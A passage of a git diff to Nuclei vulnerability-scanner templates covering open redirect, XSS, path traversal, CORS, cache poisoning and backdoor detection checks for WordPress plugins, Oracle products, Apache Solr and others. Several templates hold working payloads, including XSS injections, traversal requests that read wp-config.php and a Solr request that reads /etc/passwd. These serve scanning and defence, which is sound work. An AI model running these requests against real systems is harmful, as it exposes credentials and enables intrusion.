'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/open_redirect/pieregister-open-redirect.yaml b/poc/open_redirect/pieregister-open-redirect.yaml index 294b47b3a1..9c51ff20f2 100644 --- a/poc/open_redirect/pieregister-open-redirect.yaml +++ b/poc/open_redirect/pieregister-open-redirect.yaml @@ -1,23 +1,22 @@ id: pieregister-open-redirect + info: - name: WordPress Pie Register < 3.7.2.4 - Open Redirect - author: 0x_Akoko + name: Pie Register < 3.7.2.4 - Open Redirect severity: low - description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + author: 0x_Akoko + description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue. reference: - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - https://wordpress.org/plugins/pie-register/ - classification: - cwe-id: CWE-601 tags: wordpress,redirect,wp-plugin,pieregister + requests: - method: GET path: - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - -# Enhanced by mp on 2022/04/13 diff --git a/poc/open_redirect/pollbot-redirect-9623.yaml b/poc/open_redirect/pollbot-redirect-9623.yaml index 3963874ef9..c11e6df5d3 100644 --- a/poc/open_redirect/pollbot-redirect-9623.yaml +++ b/poc/open_redirect/pollbot-redirect-9623.yaml @@ -1,4 +1,5 @@ id: pollbot-redirect + info: name: Mozilla Pollbot Services - Unauthenticated Open Redirect author: Evan Rubinstien @@ -8,16 +9,19 @@ info: - https://bugzilla.mozilla.org/show_bug.cgi?id=1753838 - https://github.com/mozilla/PollBot tags: redirect,mozilla,pollbot + requests: - method: GET path: - - '{{BaseURL}}/%0A/interact.sh/' + - '{{BaseURL}}/%0A/example.com/' + matchers-condition: and matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - type: status status: - 301 diff --git a/poc/open_redirect/sap-redirect-10066.yaml b/poc/open_redirect/sap-redirect-10066.yaml index 906e0b928c..6b87d06067 100644 --- a/poc/open_redirect/sap-redirect-10066.yaml +++ b/poc/open_redirect/sap-redirect-10066.yaml @@ -1,25 +1,19 @@ id: sap-redirect - info: name: SAP wide open redirect author: Gal Nagli severity: medium description: A vulnerability in SAP's 'logoff' endpoint allows attackers to redirect victims to their URL of choice. tags: redirect,sap - requests: - method: GET - path: - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com" - matchers-condition: and matchers: - - type: status status: - 302 - - type: word words: - "Location: https://www.example.com" diff --git a/poc/open_redirect/thinkific-redirect-10732.yaml b/poc/open_redirect/thinkific-redirect-10732.yaml index a5baf35e95..05a87a54d0 100644 --- a/poc/open_redirect/thinkific-redirect-10732.yaml +++ b/poc/open_redirect/thinkific-redirect-10732.yaml @@ -6,11 +6,12 @@ info: severity: medium tags: redirect + requests: - method: GET path: - - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh" + - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com" matchers-condition: and matchers: @@ -19,6 +20,6 @@ requests: - 302 - type: word words: - - "*/;top.alert(2)//" part: body - - type: word words: - "text/html" diff --git a/poc/oracle/default-oracle-application-page-6891.yaml b/poc/oracle/default-oracle-application-page-6891.yaml index e96a481921..263c5493f5 100644 --- a/poc/oracle/default-oracle-application-page-6891.yaml +++ b/poc/oracle/default-oracle-application-page-6891.yaml @@ -1,10 +1,12 @@ id: default-oracle-application-page + info: name: Oracle Application Server Containers author: dhiyaneshDk severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 tags: tech,oracle + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 + requests: - method: GET path: diff --git a/poc/oracle/oracle-dbcs-9355.yaml b/poc/oracle/oracle-dbcs-9355.yaml index 4dd45891c6..29a3ed7ae9 100644 --- a/poc/oracle/oracle-dbcs-9355.yaml +++ b/poc/oracle/oracle-dbcs-9355.yaml @@ -1,23 +1,20 @@ -id: oracle-dbcs -info: - name: Oracle Database as a Service - author: pussycat0x - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 - tags: oracle,tech - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Oracle Database as a Service' - part: body - - - type: status - status: - - 200 +id: oracle-dbcs +info: + name: Oracle Database as a Service + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22 + tags: oracle,tech +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'Oracle Database as a Service' + part: body + - type: status + status: + - 200 diff --git a/poc/oracle/oracle-ebs-xss-9375.yaml b/poc/oracle/oracle-ebs-xss-9375.yaml index 8c5ff6abb9..b684437823 100644 --- a/poc/oracle/oracle-ebs-xss-9375.yaml +++ b/poc/oracle/oracle-ebs-xss-9375.yaml @@ -1,25 +1,29 @@ id: oracle-ebs-xss + info: - name: Oracle EBS - Cross-Site Scripting + name: Oracle EBS XSS author: dhiyaneshDk severity: medium + tags: oracle,xss,ebs reference: - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf - tags: oracle,xss,ebs + requests: - method: GET path: - "{{BaseURL}}/OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" - "{{BaseURL}}/OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('{{randstr}}')%3E" + matchers-condition: and matchers: - type: word words: - "" part: body + - type: status status: - 200 diff --git a/poc/oracle/oracle-fatwire-lfi.yaml b/poc/oracle/oracle-fatwire-lfi.yaml index 6038f21723..e014de6a11 100644 --- a/poc/oracle/oracle-fatwire-lfi.yaml +++ b/poc/oracle/oracle-fatwire-lfi.yaml @@ -2,15 +2,10 @@ id: oracle-fatwire-lfi info: name: Oracle Fatwire 6.3 - Path Traversal author: Bernardo Rodrigues @bernardofsr - severity: high - description: | - Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint. + severity: critical + description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint reference: - https://www.exploit-db.com/exploits/50167 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cwe-id: CWE-22 tags: lfi,oracle,fatwire requests: - method: GET @@ -25,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/poc/oracle/oracle-iplanet-web-server-9393.yaml b/poc/oracle/oracle-iplanet-web-server-9393.yaml index 8bd76eabb4..dcf6b13bc8 100644 --- a/poc/oracle/oracle-iplanet-web-server-9393.yaml +++ b/poc/oracle/oracle-iplanet-web-server-9393.yaml @@ -1,21 +1,26 @@ id: oracle-iplanet-web-server + info: name: Detect Oracle-iPlanet-Web-Server author: pussycat0x severity: info - metadata: - fofa-query: app="Oracle-iPlanet-Web-Server tags: tech,oracle + metadata: + fofa-query: 'app="Oracle-iPlanet-Web-Server' + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word + part: body words: - "Oracle iPlanet Web Server" + - type: status status: - 200 diff --git a/poc/oracle/oracle-people-enterprise-9398.yaml b/poc/oracle/oracle-people-enterprise-9398.yaml index 90f42929ea..8f732871c5 100644 --- a/poc/oracle/oracle-people-enterprise-9398.yaml +++ b/poc/oracle/oracle-people-enterprise-9398.yaml @@ -4,8 +4,7 @@ info: name: Oracle Peoplesoft Enterprise author: dhiyaneshDk severity: info - metadata: - shodan-query: http.title:"Oracle Peoplesoft Enterprise" + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Peoplesoft+Enterprise%22 tags: oracle,login,panel requests: diff --git a/poc/oracle/oracle-siebel-xss.yaml b/poc/oracle/oracle-siebel-xss.yaml index 2de4a62dca..8185fb2460 100644 --- a/poc/oracle/oracle-siebel-xss.yaml +++ b/poc/oracle/oracle-siebel-xss.yaml @@ -1,19 +1,11 @@ id: oracle-siebel-xss info: - name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting + name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability author: dhiyaneshDK - severity: high - description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. - reference: - - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html - - https://exploit-db.com/exploits/47762 - - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - remediation: Upgrade to Siebel Loyalty version 8.2 or later. - tags: xss,oracle,siebel + severity: medium + description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint. + reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html + tags: xss,oracle requests: - method: GET path: @@ -30,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/30 diff --git a/poc/other/X-Remote-Addr .yaml b/poc/other/X-Remote-Addr .yaml index b7445e1257..34bd10143c 100644 --- a/poc/other/X-Remote-Addr .yaml +++ b/poc/other/X-Remote-Addr .yaml @@ -16,4 +16,4 @@ requests: matchers: - type: word words: - - "evil.com" + - "evil" diff --git a/poc/other/adiscon-loganalyzer-70.yaml b/poc/other/adiscon-loganalyzer-70.yaml index fc33d1db2a..d9d8c2d112 100644 --- a/poc/other/adiscon-loganalyzer-70.yaml +++ b/poc/other/adiscon-loganalyzer-70.yaml @@ -1,37 +1,19 @@ id: adiscon-loganalyzer info: - name: Adiscon LogAnalyzer Detection - author: geeknik - severity: high - description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services. - reference: - - https://loganalyzer.adiscon.com/ - tags: adiscon,loganalyzer,syslog,exposures - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Adiscon LogAnalyzer' - - 'value="SYSLOG"' - - 'value="EVTRPT"' - - 'value="WEBLOG"' - condition: and - - type: status - status: - - 200 - - type: word - part: header - words: - - 'text/html' - -# Enhanced by mp on 2022/03/20 + name: adiscon-loganalyzer + author: cn-kali-team + tags: detect,tech,adiscon-loganalyzer + severity: info + metadata: + product: loganalyzer + vendor: adiscon + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - adiscon gmbh + case-insensitive: true diff --git a/poc/other/adminer-panel-75.yaml b/poc/other/adminer-panel-75.yaml index 31a391dd47..b2cf28a10c 100644 --- a/poc/other/adminer-panel-75.yaml +++ b/poc/other/adminer-panel-75.yaml @@ -1,22 +1,27 @@ id: adminer-panel + info: - name: Adminer Login panel + name: Adminer Login Panel author: random_robbie,meme-lord + description: An Adminer login panel was detected. severity: info - reference: https://blog.sorcery.ie/posts/adminer/ - tags: panel,adminer,login - - # <= 4.2.4 can have unauthenticated RCE via SQLite driver - # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL - # Most versions have some kind of SSRF usability - # Is generally handy if you find SQL creds + reference: + - https://blog.sorcery.ie/posts/adminer/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + metadata: + shodan-query: title:"Login - Adminer" + tags: panel,adminer requests: - method: GET path: + - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/_adminer.php' - '{{BaseURL}}/adminer/' - - '{{BaseURL}}/adminer.php' - '{{BaseURL}}/editor.php' - '{{BaseURL}}/mysql.php' - '{{BaseURL}}/sql.php' @@ -28,7 +33,6 @@ requests: stop-at-first-match: true matchers-condition: and matchers: - - type: word words: - "Login - Adminer" @@ -43,3 +47,5 @@ requests: group: 1 regex: - '([0-9.]+)' + +# Enhanced by mp on 2022/03/20 diff --git a/poc/other/ampps-admin-panel-305.yaml b/poc/other/ampps-admin-panel-305.yaml index 3dc153d361..1ced15ef7b 100644 --- a/poc/other/ampps-admin-panel-305.yaml +++ b/poc/other/ampps-admin-panel-305.yaml @@ -4,6 +4,9 @@ info: name: AMPPS Admin Login Panel author: deFr0ggy severity: info + description: An AMPPS Admin login panel was detected. + classification: + cwe-id: CWE-200 tags: panel,ampps,login requests: @@ -33,3 +36,5 @@ requests: group: 1 regex: - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/poc/other/ansible-semaphore-panel-328.yaml b/poc/other/ansible-semaphore-panel-328.yaml index 0aa276d1d5..9c7790ff1d 100644 --- a/poc/other/ansible-semaphore-panel-328.yaml +++ b/poc/other/ansible-semaphore-panel-328.yaml @@ -1,26 +1,32 @@ id: ansible-semaphore-panel info: - name: Ansible Semaphore Panel + name: Ansible Semaphore Panel Detect author: Yuzhe-zhang-0 severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Ansible+Semaphore%22 - tags: panel,ansible,semaphore,cicd + description: An Ansible Semaphore login panel was detected. + reference: + - https://ansible-semaphore.com/ + - https://github.com/ansible-semaphore/semaphore + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.html:"Semaphore" + tags: panel,ansible,semaphore,cicd,oss requests: - method: GET - redirects: true - max-redirects: 5 path: - - '{{BaseURL}}/' + - '{{BaseURL}}/auth/login' - matchers-condition: and + matchers-condition: or matchers: - type: word words: - - 'Ansible Semaphore' - - '>Semaphore' + - 'Ansible Semaphore' - - type: status - status: - - 200 \ No newline at end of file + - type: regex + regex: + - 'Semaphore' + +# Enhanced by mp on 2022/03/23 diff --git a/poc/other/antsword-backdoor.yaml b/poc/other/antsword-backdoor.yaml index 5cf33c9815..160e514e1b 100644 --- a/poc/other/antsword-backdoor.yaml +++ b/poc/other/antsword-backdoor.yaml @@ -1,16 +1,10 @@ id: antsword-backdoor info: - name: AntSword Backdoor Detection + name: Antsword backdook author: ffffffff0x severity: critical - description: An AntSword application backdoor shell was discovered. - reference: - - https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-553 - remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms. + description: 蚁剑「绕过 disable_functions」插件生成的 shell + reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 tags: backdoor,antsword requests: - method: POST @@ -28,5 +22,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/poc/other/apc-info.yaml b/poc/other/apc-info.yaml index cd1534ba4c..0fc35742be 100644 --- a/poc/other/apc-info.yaml +++ b/poc/other/apc-info.yaml @@ -4,12 +4,15 @@ info: name: APCu service information leakage author: koti2 severity: low + tags: config,service,apcu requests: - method: GET path: - "{{BaseURL}}/apc/apc.php" - "{{BaseURL}}/apc.php" + + stop-at-first-match: true matchers: - type: word words: diff --git a/poc/other/artifactory_deploy.yaml b/poc/other/artifactory_deploy.yaml index 23f2c562b3..d49def2967 100644 --- a/poc/other/artifactory_deploy.yaml +++ b/poc/other/artifactory_deploy.yaml @@ -1,26 +1,29 @@ id: artifactory-anonymous-deploy info: - name: Artifactory repos with anonymous deploy permissions (https://www.errno.fr/artifactory/Attacking_Artifactory.html) + name: Artifactory anonymous deploy + reference: https://www.errno.fr/artifactory/Attacking_Artifactory.html author: panch0r3d severity: high + tags: artifactory requests: - method: GET path: - "{{BaseURL}}/artifactory/ui/repodata?deploy=true" - headers: - User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + matchers-condition: and matchers: - - type: regex - regex: - - '(repoList).*?["].*["]' - - '(repoTypesList).*?["].*["]' - part: body - extractors: - - type: regex + - type: word + words: + - '"repoKey"' part: body - regex: - - '(repoTypesList).*?["].*["]' - - '(repoList).*?["].*["]' + + - type: status + status: + - 200 + + - type: word + words: + - "application/json" + part: header \ No newline at end of file diff --git a/poc/other/aspose-ie-file-download.yaml b/poc/other/aspose-ie-file-download.yaml index 18857d6187..009aa84bcd 100644 --- a/poc/other/aspose-ie-file-download.yaml +++ b/poc/other/aspose-ie-file-download.yaml @@ -1,20 +1,17 @@ id: aspose-ie-file-download - info: - name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion. + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter tags: wordpress,wp-plugin,lfi,aspose - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' - matchers-condition: and matchers: - type: word @@ -23,9 +20,6 @@ requests: - "DB_PASSWORD" part: body condition: and - - type: status status: - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/poc/other/aspose-words-file-download-572.yaml b/poc/other/aspose-words-file-download-572.yaml index a9187a88fa..ac80fecb8c 100644 --- a/poc/other/aspose-words-file-download-572.yaml +++ b/poc/other/aspose-words-file-download-572.yaml @@ -1,10 +1,10 @@ id: aspose-words-file-download info: - name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. reference: - https://wpscan.com/vulnerability/7869 - https://wordpress.org/plugins/aspose-doc-exporter diff --git a/poc/other/axis-happyaxis-669.yaml b/poc/other/axis-happyaxis-669.yaml index 2a7dfaa54e..07055894fd 100644 --- a/poc/other/axis-happyaxis-669.yaml +++ b/poc/other/axis-happyaxis-669.yaml @@ -4,11 +4,9 @@ info: name: Axis Happyaxis Exposure author: dogasantos severity: info - metadata: - max-request: 4 - tags: axis,axis2,middleware,exposure,apache,files + tags: axis,axis2,middleware,exposure,apache -http: +requests: - method: GET path: - "{{BaseURL}}/axis2/axis2-web/HappyAxis.jsp" @@ -17,7 +15,6 @@ http: - "{{BaseURL}}/happyaxis.jsp" stop-at-first-match: true - matchers-condition: and matchers: - type: word @@ -32,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220160316ce43f156b0a664a3aece681f6f7a45bfbd84f441cf9c084c86cb8e8138022100e83b37d792dd27c2a9b5358bfbcae206b18c31b37510b106613df42c9105b177:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/barracuda-panel-684.yaml b/poc/other/barracuda-panel-684.yaml index 08f83130c0..280fef29c5 100644 --- a/poc/other/barracuda-panel-684.yaml +++ b/poc/other/barracuda-panel-684.yaml @@ -4,12 +4,10 @@ info: name: Barracuda SSL VPN Log In author: dhiyaneshDK severity: info - tags: barracuda,panel,vpn description: The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any web browser. classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + tags: barracuda,panel,vpn requests: - method: GET diff --git a/poc/other/basic-cors.yaml b/poc/other/basic-cors.yaml index 1ebe0fd57d..a62918aec8 100644 --- a/poc/other/basic-cors.yaml +++ b/poc/other/basic-cors.yaml @@ -1,18 +1,22 @@ -id: basic-cors-misconfig - -info: - name: Basic CORS misconfiguration - author: nadino - severity: medium - -requests: - - method: GET - path: - - "{{BaseURL}}" - headers: - Origin: "https://evil.com" - matchers: - - type: word - words: - - "Access-Control-Allow-Origin: https://evil.com" - part: header +id: basic-cors-misconfig + +info: + name: Basic CORS misconfiguration + author: nadino + severity: info + tags: cors + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + Origin: https://evil.com + + matchers: + - type: word + words: + - "Access-Control-Allow-Origin: https://evil.com" + - "Access-Control-Allow-Credentials: true" + condition: and + part: header diff --git a/poc/other/cache-poisoning.yaml b/poc/other/cache-poisoning.yaml index 82886086dc..1703f38d93 100644 --- a/poc/other/cache-poisoning.yaml +++ b/poc/other/cache-poisoning.yaml @@ -2,26 +2,32 @@ id: cache-poisoning info: name: Cache Poisoning - author: melbadry9 & xelkomy - severity: info - reference: | - - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - - https://portswigger.net/research/practical-web-cache-poisoning - tags: cache + author: melbadry9,xelkomy,akincibor,dogasantos + severity: low + reference: + - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning + - https://portswigger.net/research/practical-web-cache-poisoning + tags: cache,generic requests: - raw: - | - GET /?mel=9 HTTP/1.1 - X-Forwarded-Prefix: cache.example.com - X-Forwarded-Host: cache.example.com - X-Forwarded-For: cache.example.com + GET /?{{randstr}}=9 HTTP/1.1 + X-Forwarded-Prefix: prefix.cache.example.com + X-Forwarded-Host: host.cache.example.com + X-Forwarded-For: for.cache.example.com - | - GET /?mel=9 HTTP/1.1 + GET /?{{randstr}}=9 HTTP/1.1 req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "cache.example.com")' + + extractors: + - type: regex + part: response + regex: + - "(prefix|host|for).cache.example.com" diff --git a/poc/other/campaignmonitor-843.yaml b/poc/other/campaignmonitor-843.yaml index bc88823e52..ce47b830ae 100644 --- a/poc/other/campaignmonitor-843.yaml +++ b/poc/other/campaignmonitor-843.yaml @@ -1,20 +1,29 @@ id: campaignmonitor-takeover info: - name: campaignmonitor takeover detection + name: CampaignMonitor Takeover Detection author: pdteam severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 + metadata: + max-request: 1 + tags: takeover,campaignmonitor -requests: +http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'Trying to access your account?' - 'or " - - "" - - "domain uri=" - condition: and - - - type: status - status: +id: clientaccesspolicy + +info: + author: emadshanab + name: Silverlight cross-domain policy + severity: info + tags: misc + +requests: + - method: GET + path: + - "{{BaseURL}}/clientaccesspolicy.xml" + + matchers-condition: and + matchers: + - type: word + words: + - "" + - "" + - "domain uri=" + condition: and + + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/other/cloudinary-1026.yaml b/poc/other/cloudinary-1026.yaml index 960dabd6e3..c7399bd374 100644 --- a/poc/other/cloudinary-1026.yaml +++ b/poc/other/cloudinary-1026.yaml @@ -1,16 +1,13 @@ id: cloudinary-basic-auth - info: name: Cloudinary Basic Auth author: gaurang severity: high tags: token,file - file: - extensions: - all - extractors: - type: regex regex: - - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" \ No newline at end of file + - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" diff --git a/poc/other/codeigniter-env.yaml b/poc/other/codeigniter-env.yaml index 17aa2df30c..02026c4c64 100644 --- a/poc/other/codeigniter-env.yaml +++ b/poc/other/codeigniter-env.yaml @@ -1,8 +1,9 @@ id: codeigniter-env info: - name: Codeigniter .env file + name: Codeigniter - .env File Discovery author: emenalf severity: high + description: Codeigniter .env file was discovered. tags: config,exposure,codeigniter requests: - method: GET @@ -29,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/other/csod-panel-1288.yaml b/poc/other/csod-panel-1288.yaml index c3bb48b3aa..b1bbc95572 100644 --- a/poc/other/csod-panel-1288.yaml +++ b/poc/other/csod-panel-1288.yaml @@ -1,20 +1,20 @@ -id: csod-panel -info: - name: CornerStoneOnDemand Instance Detection Template - author: righettod - severity: info - description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page - tags: panel,csod -requests: - - method: GET - path: - - "{{BaseURL}}" - redirects: true - max-redirects: 5 - matchers: - - type: word - words: - - "csod-custom" - - "csodcommon" - part: body - condition: or +id: csod-panel +info: + name: CornerStoneOnDemand Instance Detection Template + author: righettod + severity: info + description: Try to detect the presence of a CornerStoneOnDemand (CSOD www.cornerstoneondemand.com) instance via the login page + tags: panel,csod +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 5 + matchers: + - type: word + words: + - "csod-custom" + - "csodcommon" + part: body + condition: or diff --git a/poc/other/custom-solr-file-read.yaml b/poc/other/custom-solr-file-read.yaml index 70667d27fb..8af1e2bc32 100644 --- a/poc/other/custom-solr-file-read.yaml +++ b/poc/other/custom-solr-file-read.yaml @@ -1,37 +1,44 @@ -id: apache-solr-file-read -info: - name: Apache Solr <= 8.8.1 Arbitrary File Read - author: DhiyaneshDk - severity: high - reference: - - https://twitter.com/Al1ex4/status/1382981479727128580 - - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ - - https://twitter.com/sec715/status/1373472323538362371 - tags: apache,solr,lfi -requests: - - raw: - - | - GET /solr/admin/cores?wt=json HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - - | - GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 - Host: {{Hostname}} - Accept-Language: en - Connection: close - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" +id: apache-solr-file-read + +info: + name: Apache Solr <= 8.8.1 Arbitrary File Read + author: DhiyaneshDk + severity: high + tags: apache,solr,lfi + reference: + - https://twitter.com/Al1ex4/status/1382981479727128580 + - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/ + - https://twitter.com/sec715/status/1373472323538362371 + +requests: + - raw: + - | + GET /solr/admin/cores?wt=json HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + - | + GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Connection: close + + + extractors: + - type: regex + internal: true + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" \ No newline at end of file diff --git a/poc/other/d-link-wireless.yaml b/poc/other/d-link-wireless.yaml index 7ef91edf61..d896e4fb9c 100644 --- a/poc/other/d-link-wireless.yaml +++ b/poc/other/d-link-wireless.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6784 - tags: panel,dlink,router + tags: panel requests: - method: GET diff --git a/poc/other/deprecated-tls-6957.yaml b/poc/other/deprecated-tls-6957.yaml index 6304e53d9a..51a6f4e9b6 100644 --- a/poc/other/deprecated-tls-6957.yaml +++ b/poc/other/deprecated-tls-6957.yaml @@ -1,8 +1,7 @@ id: deprecated-tls - info: name: Deprecated TLS Detection (TLS 1.1 or SSLv3) - author: righettod,forgedhallpass + author: righettod severity: info reference: - https://ssl-config.mozilla.org/#config=intermediate @@ -11,35 +10,13 @@ info: remediation: | Update the web server's TLS configuration to disable TLS 1.1 and SSLv3. metadata: - max-request: 3 shodan-query: ssl.version:sslv2 ssl.version:sslv3 ssl.version:tlsv1 ssl.version:tlsv1.1 tags: ssl - ssl: - address: "{{Host}}:{{Port}}" - min_version: ssl30 - max_version: ssl30 - - extractors: - - type: json - json: - - " .tls_version" - - - address: "{{Host}}:{{Port}}" - min_version: tls10 - max_version: tls10 - - extractors: - - type: json - json: - - " .tls_version" - - - address: "{{Host}}:{{Port}}" - min_version: tls11 + min_version: sslv3 max_version: 